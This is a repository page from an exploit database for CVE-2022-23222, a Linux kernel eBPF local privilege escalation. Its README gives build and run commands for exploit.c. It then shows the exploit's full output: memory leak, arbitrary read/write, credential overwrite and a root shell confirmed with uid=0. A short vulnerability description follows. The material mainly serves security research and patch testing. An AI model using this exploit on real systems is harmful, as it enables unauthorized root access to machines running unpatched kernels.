openkylin-exploit-db/cve/linux-kernel/2022/CVE-2022-23222
LI, WENJIE 1faf70023c first commit 2022-10-17 17:19:31 +08:00
include first commit 2022-10-17 17:19:31 +08:00
Makefile first commit 2022-10-17 17:19:31 +08:00
README.md first commit 2022-10-17 17:19:31 +08:00
exploit.c first commit 2022-10-17 17:19:31 +08:00

README.md

CVE-2022-23222

Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

For educational/research purposes only. Use at your own risk.

Build & Run

$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done

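Vulnerability ID

CVE-2022-23222

Severity

High

Description

Linux kernel versions 5.15.14 and earlier contain a code-issue vulnerability that an attacker can exploit to gain privileges.

Vulnerability type

Privilege escalation

Source of the vulnerability detection program

Patch link

References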